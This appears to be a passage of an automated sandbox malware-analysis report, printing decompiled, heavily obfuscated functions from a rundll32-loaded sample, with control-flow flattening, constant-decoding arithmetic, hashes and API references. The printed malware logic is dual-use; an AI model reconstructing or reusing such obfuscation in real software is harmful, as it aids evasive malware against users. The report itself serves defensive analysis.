                                                                                                                                    				_v44 = _v44 ^ 0x0004b329;
                                                                                                                                    				_v24 = 0xd75fdc;
                                                                                                                                    				_v24 = _v24 + 0x1e6b;
                                                                                                                                    				_v24 = _v24 ^ 0x00df7832;
                                                                                                                                    				_v92 = 0x2978f4;
                                                                                                                                    				_v92 = _v92 ^ 0x1aa3462f;
                                                                                                                                    				_v92 = _v92 * 0x3a;
                                                                                                                                    				_v92 = _v92 | 0xa828e589;
                                                                                                                                    				_v92 = _v92 ^ 0xab738ef3;
                                                                                                                                    				_v28 = 0xea47cd;
                                                                                                                                    				_v28 = _v28 * 0x68;
                                                                                                                                    				_v28 = _v28 ^ 0x5f2069e4;
                                                                                                                                    				_v16 = 0x52c32f;
                                                                                                                                    				_v16 = _v16 | 0xda6d254c;
                                                                                                                                    				_v16 = _v16 ^ 0xda7308ab;
                                                                                                                                    				_v48 = 0xc39de2;
                                                                                                                                    				_v48 = _v48 ^ 0x402eeacb;
                                                                                                                                    				_v48 = _v48 + 0xb85a;
                                                                                                                                    				_v48 = _v48 ^ 0x40eaab85;
                                                                                                                                    				_v52 = 0xbb994d;
                                                                                                                                    				_v52 = _v52 | 0x0bb22e40;
                                                                                                                                    				_v52 = _v52 ^ 0x7c36a9dd;
                                                                                                                                    				_v52 = _v52 ^ 0x7782b78d;
                                                                                                                                    				_v68 = 0x6ee7f1;
                                                                                                                                    				_v68 = _v68 * 3;
                                                                                                                                    				_v68 = _v68 * 0x65;
                                                                                                                                    				_v68 = _v68 + 0xffffc283;
                                                                                                                                    				_v68 = _v68 ^ 0x834839c0;
                                                                                                                                    				_v4 = 0x2c076e;
                                                                                                                                    				_v4 = _v4 >> 2;
                                                                                                                                    				_v4 = _v4 ^ 0x00027705;
                                                                                                                                    				_v32 = 0x2be47d;
                                                                                                                                    				_v32 = _v32 >> 3;
                                                                                                                                    				_v32 = _v32 << 0x10;
                                                                                                                                    				_v32 = _v32 ^ 0x7c8953c8;
                                                                                                                                    				_v72 = 0x664751;
                                                                                                                                    				_v72 = _v72 + 0xffffb67a;
                                                                                                                                    				_v72 = _v72 + 0xf05a;
                                                                                                                                    				_v72 = _v72 + 0xffff370a;
                                                                                                                                    				_v72 = _v72 ^ 0x0066b29b;
                                                                                                                                    				goto L1;
                                                                                                                                    				do {
                                                                                                                                    					while(1) {
                                                                                                                                    						L1:
                                                                                                                                    						_t254 = _t249 - 0xe145aac;
                                                                                                                                    						if(_t254 > 0) {
                                                                                                                                    							break;
                                                                                                                                    						}
                                                                                                                                    						if(_t254 == 0) {
                                                                                                                                    							_push(_t238);
                                                                                                                                    							_push(_t238);
                                                                                                                                    							_t220 = E002C474B();
                                                                                                                                    							_t251 =  &(_t251[2]);
                                                                                                                                    							_t249 = 0x70e2d06;
                                                                                                                                    							_t248 = _t248 + _t220;
                                                                                                                                    							continue;
                                                                                                                                    						} else {
                                                                                                                                    							if(_t249 == 0x15047ce) {
                                                                                                                                    								_push(_t238);
                                                                                                                                    								_push(_t238);
                                                                                                                                    								_t224 = E002C474B();
                                                                                                                                    								_t251 =  &(_t251[2]);
                                                                                                                                    								_t249 = 0xe32aaf2;
                                                                                                                                    								_t248 = _t248 + _t224;
                                                                                                                                    								continue;
                                                                                                                                    							} else {
                                                                                                                                    								if(_t249 == 0x4d33fe3) {
                                                                                                                                    									_push(_t238);
                                                                                                                                    									_push(_t238);
                                                                                                                                    									_t228 = E002C474B();
                                                                                                                                    									_t251 =  &(_t251[2]);
                                                                                                                                    									_t249 = 0xe45b300;
                                                                                                                                    									_t248 = _t248 + _t228;
                                                                                                                                    									continue;
                                                                                                                                    								} else {
                                                                                                                                    									if(_t249 == 0x708a22e) {
                                                                                                                                    										_t238 = _v56;
                                                                                                                                    										_t229 = E002DC2F8(_t238, _t234 + 0x1c, _v60, _v20, _v64);
                                                                                                                                    										_t251 =  &(_t251[3]);
                                                                                                                                    										_t249 = 0x15047ce;
                                                                                                                                    										_t248 = _t248 + _t229;
                                                                                                                                    										continue;
                                                                                                                                    									} else {
                                                                                                                                    										if(_t249 != 0x70e2d06) {
                                                                                                                                    											goto L17;
                                                                                                                                    										} else {
                                                                                                                                    											_push(_t238);
                                                                                                                                    											_push(_t238);
                                                                                                                                    											_t233 = E002C474B();
                                                                                                                                    											_t251 =  &(_t251[2]);
                                                                                                                                    											_t249 = 0x4d33fe3;
                                                                                                                                    											_t248 = _t248 + _t233;
                                                                                                                                    											continue;
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						L20:
                                                                                                                                    						return _t248;
                                                                                                                                    					}
                                                                                                                                    					if(_t249 == 0xe32aaf2) {
                                                                                                                                    						_push(_t238);
                                                                                                                                    						_push(_t238);
                                                                                                                                    						_t214 = E002C474B();
                                                                                                                                    						_t251 =  &(_t251[2]);
                                                                                                                                    						_t249 = 0xe145aac;
                                                                                                                                    						_t248 = _t248 + _t214;
                                                                                                                                    						goto L17;
                                                                                                                                    					} else {
                                                                                                                                    						if(_t249 == 0xe45b300) {
                                                                                                                                    							_t248 = _t248 + E002DC2F8(_v68, _t234 + 0x14, _v4, _v32, _v72);
                                                                                                                                    						} else {
                                                                                                                                    							if(_t249 != 0xe982267) {
                                                                                                                                    								goto L17;
                                                                                                                                    							} else {
                                                                                                                                    								_t249 = 0x708a22e;
                                                                                                                                    								goto L1;
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					goto L20;
                                                                                                                                    					L17:
                                                                                                                                    				} while (_t249 != 0xce30a1f);
                                                                                                                                    				goto L20;
                                                                                                                                    			}








































                                                                                                                                    0x002dc850
                                                                                                                                    0x002dc858
                                                                                                                                    0x002dc860
                                                                                                                                    0x002dc868
                                                                                                                                    0x002dc870
                                                                                                                                    0x002dc878
                                                                                                                                    0x002dc880
                                                                                                                                    0x002dc888
                                                                                                                                    0x002dc890
                                                                                                                                    0x002dc898
                                                                                                                                    0x002dc8a5
                                                                                                                                    0x002dc8ae
                                                                                                                                    0x002dc8b2
                                                                                                                                    0x002dc8ba
                                                                                                                                    0x002dc8c2
                                                                                                                                    0x002dc8ca
                                                                                                                                    0x002dc8cf
                                                                                                                                    0x002dc8d7
                                                                                                                                    0x002dc8df
                                                                                                                                    0x002dc8e4
                                                                                                                                    0x002dc8e9
                                                                                                                                    0x002dc8f1
                                                                                                                                    0x002dc8f9
                                                                                                                                    0x002dc901
                                                                                                                                    0x002dc909
                                                                                                                                    0x002dc911
                                                                                                                                    0x002dc911
                                                                                                                                    0x002dc919
                                                                                                                                    0x002dc919
                                                                                                                                    0x002dc919
                                                                                                                                    0x002dc919
                                                                                                                                    0x002dc91b
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002dc921
                                                                                                                                    0x002dc9e2
                                                                                                                                    0x002dc9e3
                                                                                                                                    0x002dc9e4
                                                                                                                                    0x002dc9e9
                                                                                                                                    0x002dc9ec
                                                                                                                                    0x002dc9f1
                                                                                                                                    0x00000000
                                                                                                                                    0x002dc927
                                                                                                                                    0x002dc92d
                                                                                                                                    0x002dc9c0
                                                                                                                                    0x002dc9c1
                                                                                                                                    0x002dc9c2
                                                                                                                                    0x002dc9c7
                                                                                                                                    0x002dc9ca
                                                                                                                                    0x002dc9cf
                                                                                                                                    0x00000000
                                                                                                                                    0x002dc933
                                                                                                                                    0x002dc939
                                                                                                                                    0x002dc99e
                                                                                                                                    0x002dc99f
                                                                                                                                    0x002dc9a0
                                                                                                                                    0x002dc9a5
                                                                                                                                    0x002dc9a8
                                                                                                                                    0x002dc9ad
                                                                                                                                    0x00000000
                                                                                                                                    0x002dc93b
                                                                                                                                    0x002dc941
                                                                                                                                    0x002dc97d
                                                                                                                                    0x002dc981
                                                                                                                                    0x002dc986
                                                                                                                                    0x002dc989
                                                                                                                                    0x002dc98e
                                                                                                                                    0x00000000
                                                                                                                                    0x002dc943
                                                                                                                                    0x002dc949
                                                                                                                                    0x00000000
                                                                                                                                    0x002dc94f
                                                                                                                                    0x002dc95b
                                                                                                                                    0x002dc95c
                                                                                                                                    0x002dc95d
                                                                                                                                    0x002dc962
                                                                                                                                    0x002dc965
                                                                                                                                    0x002dc96a
                                                                                                                                    0x00000000
                                                                                                                                    0x002dc96a
                                                                                                                                    0x002dc949
                                                                                                                                    0x002dc941
                                                                                                                                    0x002dc939
                                                                                                                                    0x002dc92d
                                                                                                                                    0x002dca5f
                                                                                                                                    0x002dca68
                                                                                                                                    0x002dca68
                                                                                                                                    0x002dc9fe
                                                                                                                                    0x002dca26
                                                                                                                                    0x002dca27
                                                                                                                                    0x002dca28
                                                                                                                                    0x002dca2d
                                                                                                                                    0x002dca30
                                                                                                                                    0x002dca32
                                                                                                                                    0x00000000
                                                                                                                                    0x002dca00
                                                                                                                                    0x002dca06
                                                                                                                                    0x002dca5d
                                                                                                                                    0x002dca08
                                                                                                                                    0x002dca0e
                                                                                                                                    0x00000000
                                                                                                                                    0x002dca10
                                                                                                                                    0x002dca10
                                                                                                                                    0x00000000
                                                                                                                                    0x002dca10
                                                                                                                                    0x002dca0e
                                                                                                                                    0x002dca06
                                                                                                                                    0x00000000
                                                                                                                                    0x002dca34
                                                                                                                                    0x002dca34
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: )L$Eh$QGf$w)!$}+$%l$i _
                                                                                                                                    • API String ID: 0-3797278058
                                                                                                                                    • Opcode ID: 24a842ca848367424d792b2c1ed1d107ee6d6e6c77a466d1125fff4a40fa415b
                                                                                                                                    • Instruction ID: 85e5c9fdae5bc61f0451f0e4374cd9303f1fe4b7d18bc225d319d18552fe665e
                                                                                                                                    • Opcode Fuzzy Hash: 24a842ca848367424d792b2c1ed1d107ee6d6e6c77a466d1125fff4a40fa415b
                                                                                                                                    • Instruction Fuzzy Hash: 81A141B28183429FC348CF25D48A85FFBE1BB85748F504A1EF595A6220D3B5DA19CF83
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                    			E002CE2CC(void* __edx, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                    				char _v556;
                                                                                                                                    				intOrPtr _v576;
                                                                                                                                    				char _v600;
                                                                                                                                    				signed int _v604;
                                                                                                                                    				signed int _v608;
                                                                                                                                    				signed int _v612;
                                                                                                                                    				signed int _v616;
                                                                                                                                    				signed int _v620;
                                                                                                                                    				signed int _v624;
                                                                                                                                    				signed int _v628;
                                                                                                                                    				signed int _v632;
                                                                                                                                    				signed int _v636;
                                                                                                                                    				signed int _v640;
                                                                                                                                    				signed int _v644;
                                                                                                                                    				signed int _v648;
                                                                                                                                    				signed int _v652;
                                                                                                                                    				void* __ecx;
                                                                                                                                    				void* _t136;
                                                                                                                                    				void* _t151;
                                                                                                                                    				signed int _t153;
                                                                                                                                    				signed int _t156;
                                                                                                                                    				void* _t162;
                                                                                                                                    				signed int _t167;
                                                                                                                                    				intOrPtr _t187;
                                                                                                                                    				signed int _t188;
                                                                                                                                    				signed int _t189;
                                                                                                                                    				signed int _t190;
                                                                                                                                    				signed int _t191;
                                                                                                                                    				signed int _t192;
                                                                                                                                    				signed int* _t196;
                                                                                                                                    
                                                                                                                                    				_push(_a12);
                                                                                                                                    				_t187 = _a8;
                                                                                                                                    				_push(_t187);
                                                                                                                                    				_push(E002C8E4D);
                                                                                                                                    				_push(__edx);
                                                                                                                                    				E002D20B9(_t136);
                                                                                                                                    				_v608 = 0x1ac257;
                                                                                                                                    				_t196 =  &(( &_v652)[5]);
                                                                                                                                    				_v608 = _v608 ^ 0x78a3296c;
                                                                                                                                    				_v608 = _v608 ^ 0x78b9eb39;
                                                                                                                                    				_t162 = 0xac58df2;
                                                                                                                                    				_v624 = 0x387e66;
                                                                                                                                    				_t9 =  &_v624; // 0x387e66
                                                                                                                                    				_t188 = 0x2e;
                                                                                                                                    				_v624 =  *_t9 * 0x13;
                                                                                                                                    				_v624 = _v624 / _t188;
                                                                                                                                    				_v624 = _v624 ^ 0x001972d5;
                                                                                                                                    				_v644 = 0x433552;
                                                                                                                                    				_v644 = _v644 + 0xffffa6b6;
                                                                                                                                    				_v644 = _v644 ^ 0x94defa20;
                                                                                                                                    				_v644 = _v644 << 1;
                                                                                                                                    				_v644 = _v644 ^ 0x293db944;
                                                                                                                                    				_v652 = 0xb70b59;
                                                                                                                                    				_v652 = _v652 << 0xb;
                                                                                                                                    				_v652 = _v652 + 0xffff8138;
                                                                                                                                    				_t189 = 0x15;
                                                                                                                                    				_v652 = _v652 / _t189;
                                                                                                                                    				_v652 = _v652 ^ 0x08c5a62f;
                                                                                                                                    				_v616 = 0xf4782f;
                                                                                                                                    				_v616 = _v616 >> 0xa;
                                                                                                                                    				_v616 = _v616 + 0xffff066a;
                                                                                                                                    				_v616 = _v616 ^ 0xfff8c7bc;
                                                                                                                                    				_v604 = 0x656560;
                                                                                                                                    				_v604 = _v604 >> 3;
                                                                                                                                    				_v604 = _v604 ^ 0x0000606f;
                                                                                                                                    				_v648 = 0x377d9b;
                                                                                                                                    				_t190 = 0x7f;
                                                                                                                                    				_v648 = _v648 / _t190;
                                                                                                                                    				_v648 = _v648 + 0xfd7f;
                                                                                                                                    				_v648 = _v648 + 0xffff6b0a;
                                                                                                                                    				_v648 = _v648 ^ 0x00006649;
                                                                                                                                    				_v636 = 0x80cedd;
                                                                                                                                    				_t191 = 0x58;
                                                                                                                                    				_v636 = _v636 / _t191;
                                                                                                                                    				_v636 = _v636 + 0x515e;
                                                                                                                                    				_v636 = _v636 ^ 0x000b92de;
                                                                                                                                    				_v620 = 0x65d9bd;
                                                                                                                                    				_v620 = _v620 + 0xffff4b50;
                                                                                                                                    				_v620 = _v620 ^ 0xd34cfccc;
                                                                                                                                    				_v620 = _v620 ^ 0xd32e4bd2;
                                                                                                                                    				_v632 = 0xb89e86;
                                                                                                                                    				_v632 = _v632 + 0xffffcc79;
                                                                                                                                    				_t192 = 0x2f;
                                                                                                                                    				_v632 = _v632 / _t192;
                                                                                                                                    				_v632 = _v632 ^ 0x00046a67;
                                                                                                                                    				_v628 = 0xbb1c4a;
                                                                                                                                    				_v628 = _v628 >> 6;
                                                                                                                                    				_v628 = _v628 >> 9;
                                                                                                                                    				_v628 = _v628 ^ 0x000a4ee8;
                                                                                                                                    				_v640 = 0xfd7114;
                                                                                                                                    				_v640 = _v640 << 5;
                                                                                                                                    				_v640 = _v640 * 0x45;
                                                                                                                                    				_v640 = _v640 + 0xa2ea;
                                                                                                                                    				_v640 = _v640 ^ 0x89e0c310;
                                                                                                                                    				_v612 = 0x26e293;
                                                                                                                                    				_v612 = _v612 >> 0xd;
                                                                                                                                    				_v612 = _v612 ^ 0x00050986;
                                                                                                                                    				_t193 = _v612;
                                                                                                                                    				do {
                                                                                                                                    					while(_t162 != 0x249e110) {
                                                                                                                                    						if(_t162 == 0x48c9d54) {
                                                                                                                                    							_v556 = 0x22c;
                                                                                                                                    							_t153 = E002DC15D(_t193, _v652, _v616,  &_v556, _v604);
                                                                                                                                    							_t196 =  &(_t196[3]);
                                                                                                                                    							asm("sbb ecx, ecx");
                                                                                                                                    							_t167 =  ~_t153 & 0xf758a92f;
                                                                                                                                    							L13:
                                                                                                                                    							_t162 = _t167 + 0xe63f1a5;
                                                                                                                                    							continue;
                                                                                                                                    						}
                                                                                                                                    						if(_t162 == 0x5bc9ad4) {
                                                                                                                                    							_t156 = E002C8E4D( &_v556,  &_v600);
                                                                                                                                    							asm("sbb ecx, ecx");
                                                                                                                                    							_t167 =  ~_t156 & 0xf3e5ef6b;
                                                                                                                                    							goto L13;
                                                                                                                                    						}
                                                                                                                                    						if(_t162 == 0xac58df2) {
                                                                                                                                    							_v576 = _t187;
                                                                                                                                    							_t162 = 0xcf1a497;
                                                                                                                                    							continue;
                                                                                                                                    						}
                                                                                                                                    						if(_t162 != 0xcf1a497) {
                                                                                                                                    							if(_t162 == 0xe63f1a5) {
                                                                                                                                    								return E002D1E67(_v632, _v628, _v640, _v612, _t193);
                                                                                                                                    							}
                                                                                                                                    							goto L18;
                                                                                                                                    						}
                                                                                                                                    						_push(_t162);
                                                                                                                                    						_t156 = E002C5988(_t162, _v608);
                                                                                                                                    						_t193 = _t156;
                                                                                                                                    						if(_t156 != 0xffffffff) {
                                                                                                                                    							_t162 = 0x48c9d54;
                                                                                                                                    							continue;
                                                                                                                                    						}
                                                                                                                                    						L8:
                                                                                                                                    						return _t156;
                                                                                                                                    					}
                                                                                                                                    					_t151 = E002C2A58(_v648, _t193,  &_v556, _v636, _v620);
                                                                                                                                    					_t196 =  &(_t196[3]);
                                                                                                                                    					if(_t151 == 0) {
                                                                                                                                    						_t162 = 0xe63f1a5;
                                                                                                                                    						goto L18;
                                                                                                                                    					} else {
                                                                                                                                    						_t162 = 0x5bc9ad4;
                                                                                                                                    						continue;
                                                                                                                                    					}
                                                                                                                                    					goto L8;
                                                                                                                                    					L18:
                                                                                                                                    				} while (_t162 != 0xad68edc);
                                                                                                                                    				return _t156;
                                                                                                                                    			}


































                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: If$R5C$^Q$`ee$f~8$o`$N
                                                                                                                                    • API String ID: 0-3572798563
                                                                                                                                    • Opcode ID: f51eb1b3559e1626032a78683ad6bcfe271b73ad5206c5b249aa3128532c0a43
                                                                                                                                    • Instruction ID: 174ccdd89fd5b6e1dff838865c9053032afb7e360af129200358bce2a71127cb
                                                                                                                                    • Opcode Fuzzy Hash: f51eb1b3559e1626032a78683ad6bcfe271b73ad5206c5b249aa3128532c0a43
                                                                                                                                    • Instruction Fuzzy Hash: 867186B2518301DFC768CF22C88995FBBE1EBC4768F504A1DF486962A0D775CA19CF82
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • _strcpy_s.LIBCMT ref: 10014B9E
                                                                                                                                      • Part of subcall function 100311F4: __getptd_noexit.LIBCMT ref: 100311F4
                                                                                                                                    • __snprintf_s.LIBCMT ref: 10014BD7
                                                                                                                                      • Part of subcall function 1003119A: __vsnprintf_s_l.LIBCMT ref: 100311AF
                                                                                                                                    • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 10014C02
                                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 10014C25
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InfoLibraryLoadLocale__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
                                                                                                                                    • String ID: LOC
                                                                                                                                    • API String ID: 3864805678-519433814
                                                                                                                                    • Opcode ID: 993ef955d11e1d056c0da4e243e940ae0abcf9c49e17b7ca6a81ba24efbb4c92
                                                                                                                                    • Instruction ID: c6b9acf05ba5f485c5c472c95a6cc1a1d49ea65b07ecc8430683ae88ba63382e
                                                                                                                                    • Opcode Fuzzy Hash: 993ef955d11e1d056c0da4e243e940ae0abcf9c49e17b7ca6a81ba24efbb4c92
                                                                                                                                    • Instruction Fuzzy Hash: B011E471900118AFDB11DB64CC86BDD73B8EF09315F1241A1F7059F0A1EEB0E9859AD1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                    			E002CCF47(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20) {
                                                                                                                                    				char _v32;
                                                                                                                                    				intOrPtr _v40;
                                                                                                                                    				intOrPtr _v52;
                                                                                                                                    				intOrPtr _v56;
                                                                                                                                    				intOrPtr _v88;
                                                                                                                                    				char* _v92;
                                                                                                                                    				char _v112;
                                                                                                                                    				char _v120;
                                                                                                                                    				intOrPtr _v124;
                                                                                                                                    				char _v128;
                                                                                                                                    				signed int _v132;
                                                                                                                                    				signed int _v136;
                                                                                                                                    				signed int _v140;
                                                                                                                                    				signed int _v144;
                                                                                                                                    				signed int _v148;
                                                                                                                                    				signed int _v152;
                                                                                                                                    				signed int _v156;
                                                                                                                                    				signed int _v160;
                                                                                                                                    				signed int _v164;
                                                                                                                                    				signed int _v168;
                                                                                                                                    				signed int _v172;
                                                                                                                                    				signed int _v176;
                                                                                                                                    				signed int _v180;
                                                                                                                                    				signed int _v184;
                                                                                                                                    				signed int _v188;
                                                                                                                                    				signed int _v192;
                                                                                                                                    				signed int _v196;
                                                                                                                                    				signed int _v200;
                                                                                                                                    				signed int _v204;
                                                                                                                                    				signed int _v208;
                                                                                                                                    				signed int _v212;
                                                                                                                                    				signed int _v216;
                                                                                                                                    				signed int _v220;
                                                                                                                                    				signed int _v224;
                                                                                                                                    				signed int _v228;
                                                                                                                                    				signed int _v232;
                                                                                                                                    				signed int _v236;
                                                                                                                                    				signed int _v240;
                                                                                                                                    				signed int _v244;
                                                                                                                                    				signed int _v248;
                                                                                                                                    				signed int _v252;
                                                                                                                                    				signed int _v256;
                                                                                                                                    				signed int _v260;
                                                                                                                                    				signed int _v264;
                                                                                                                                    				signed int _v268;
                                                                                                                                    				void* _t345;
                                                                                                                                    				void* _t377;
                                                                                                                                    				void* _t378;
                                                                                                                                    				void* _t386;
                                                                                                                                    				void* _t393;
                                                                                                                                    				intOrPtr _t403;
                                                                                                                                    				intOrPtr* _t406;
                                                                                                                                    				void* _t408;
                                                                                                                                    				signed char* _t414;
                                                                                                                                    				signed char* _t450;
                                                                                                                                    				intOrPtr* _t455;
                                                                                                                                    				intOrPtr _t456;
                                                                                                                                    				intOrPtr _t457;
                                                                                                                                    				void* _t458;
                                                                                                                                    				signed char* _t459;
                                                                                                                                    				signed int _t460;
                                                                                                                                    				signed int _t461;
                                                                                                                                    				signed int _t462;
                                                                                                                                    				signed int _t463;
                                                                                                                                    				signed int _t464;
                                                                                                                                    				signed int _t465;
                                                                                                                                    				signed int _t466;
                                                                                                                                    				signed int _t467;
                                                                                                                                    				signed int _t468;
                                                                                                                                    				signed int _t469;
                                                                                                                                    				void* _t470;
                                                                                                                                    				void* _t471;
                                                                                                                                    				void* _t474;
                                                                                                                                    
                                                                                                                                    				_t406 = _a8;
                                                                                                                                    				_t456 = _a4;
                                                                                                                                    				_push(_a20);
                                                                                                                                    				_t455 = _a16;
                                                                                                                                    				_push(_t455);
                                                                                                                                    				_push(_a12);
                                                                                                                                    				_push(_t406);
                                                                                                                                    				_push(_t456);
                                                                                                                                    				_push(__edx);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				E002D20B9(_t345);
                                                                                                                                    				_v256 = 0xcf1dac;
                                                                                                                                    				_t471 = _t470 + 0x1c;
                                                                                                                                    				_v256 = _v256 ^ 0x662b1d0f;
                                                                                                                                    				_v256 = _v256 << 2;
                                                                                                                                    				_t408 = 0x8e80a37;
                                                                                                                                    				_v256 = _v256 + 0xffff9089;
                                                                                                                                    				_v256 = _v256 ^ 0x9b8f9315;
                                                                                                                                    				_v160 = 0x25617a;
                                                                                                                                    				_v160 = _v160 << 2;
                                                                                                                                    				_v160 = _v160 ^ 0x009585a8;
                                                                                                                                    				_v264 = 0x39e017;
                                                                                                                                    				_v264 = _v264 + 0xffffbc9c;
                                                                                                                                    				_v264 = _v264 ^ 0xb11c7ead;
                                                                                                                                    				_v264 = _v264 + 0xffffd7b2;
                                                                                                                                    				_v264 = _v264 ^ 0xb125b990;
                                                                                                                                    				_v240 = 0xb82586;
                                                                                                                                    				_t460 = 0x74;
                                                                                                                                    				_v240 = _v240 / _t460;
                                                                                                                                    				_v240 = _v240 << 1;
                                                                                                                                    				_t461 = 0x3b;
                                                                                                                                    				_v132 = _v132 & 0x00000000;
                                                                                                                                    				_v240 = _v240 * 0x36;
                                                                                                                                    				_v240 = _v240 ^ 0x00aace1a;
                                                                                                                                    				_v180 = 0xcab8fe;
                                                                                                                                    				_v180 = _v180 ^ 0xca9451c5;
                                                                                                                                    				_v180 = _v180 | 0x3e03c42f;
                                                                                                                                    				_v180 = _v180 ^ 0xfe5c53ad;
                                                                                                                                    				_v248 = 0x57862;
                                                                                                                                    				_v248 = _v248 | 0x3f7dcfba;
                                                                                                                                    				_v248 = _v248 / _t461;
                                                                                                                                    				_t462 = 0x62;
                                                                                                                                    				_v248 = _v248 / _t462;
                                                                                                                                    				_v248 = _v248 ^ 0x00057d9a;
                                                                                                                                    				_v252 = 0x68f561;
                                                                                                                                    				_v252 = _v252 << 6;
                                                                                                                                    				_v252 = _v252 >> 0xd;
                                                                                                                                    				_v252 = _v252 | 0x3cddc102;
                                                                                                                                    				_v252 = _v252 ^ 0x3cda88f2;
                                                                                                                                    				_v192 = 0x7c8e99;
                                                                                                                                    				_v192 = _v192 + 0x829c;
                                                                                                                                    				_v192 = _v192 * 0x31;
                                                                                                                                    				_v192 = _v192 ^ 0x17fda794;
                                                                                                                                    				_v228 = 0x74d91a;
                                                                                                                                    				_v228 = _v228 << 3;
                                                                                                                                    				_v228 = _v228 + 0x7502;
                                                                                                                                    				_v228 = _v228 * 0x63;
                                                                                                                                    				_v228 = _v228 ^ 0x69a7ce60;
                                                                                                                                    				_v208 = 0xc909ae;
                                                                                                                                    				_v208 = _v208 << 1;
                                                                                                                                    				_t463 = 0xb;
                                                                                                                                    				_v208 = _v208 / _t463;
                                                                                                                                    				_v208 = _v208 ^ 0x00276772;
                                                                                                                                    				_v164 = 0x673800;
                                                                                                                                    				_v164 = _v164 << 9;
                                                                                                                                    				_v164 = _v164 ^ 0xce7e8a93;
                                                                                                                                    				_v232 = 0xb859bd;
                                                                                                                                    				_v232 = _v232 + 0xde76;
                                                                                                                                    				_t464 = 0x5b;
                                                                                                                                    				_v232 = _v232 * 0x1c;
                                                                                                                                    				_v232 = _v232 * 0x30;
                                                                                                                                    				_v232 = _v232 ^ 0xcc63b0a7;
                                                                                                                                    				_v172 = 0x7eda56;
                                                                                                                                    				_v172 = _v172 << 3;
                                                                                                                                    				_v172 = _v172 ^ 0x03f50911;
                                                                                                                                    				_v184 = 0x2f7891;
                                                                                                                                    				_v184 = _v184 / _t464;
                                                                                                                                    				_t465 = 0x41;
                                                                                                                                    				_v184 = _v184 * 0x49;
                                                                                                                                    				_v184 = _v184 ^ 0x0024fbf7;
                                                                                                                                    				_v148 = 0x4a0bea;
                                                                                                                                    				_v148 = _v148 ^ 0x502016f1;
                                                                                                                                    				_v148 = _v148 ^ 0x506ad42a;
                                                                                                                                    				_v260 = 0x9ebd58;
                                                                                                                                    				_v260 = _v260 >> 8;
                                                                                                                                    				_v260 = _v260 << 0xf;
                                                                                                                                    				_v260 = _v260 + 0xb306;
                                                                                                                                    				_v260 = _v260 ^ 0x4f54a3e8;
                                                                                                                                    				_v204 = 0xce3506;
                                                                                                                                    				_v204 = _v204 << 0xf;
                                                                                                                                    				_v204 = _v204 << 0xc;
                                                                                                                                    				_v204 = _v204 ^ 0x300ddb73;
                                                                                                                                    				_v244 = 0xe7c592;
                                                                                                                                    				_v244 = _v244 >> 5;
                                                                                                                                    				_v244 = _v244 ^ 0x506a7775;
                                                                                                                                    				_v244 = _v244 << 1;
                                                                                                                                    				_v244 = _v244 ^ 0xa0d2afa7;
                                                                                                                                    				_v268 = 0x1d8a79;
                                                                                                                                    				_v268 = _v268 << 2;
                                                                                                                                    				_v268 = _v268 / _t465;
                                                                                                                                    				_v268 = _v268 | 0x253986a4;
                                                                                                                                    				_v268 = _v268 ^ 0x2531568a;
                                                                                                                                    				_v216 = 0x116531;
                                                                                                                                    				_t466 = 0x61;
                                                                                                                                    				_v216 = _v216 * 0x66;
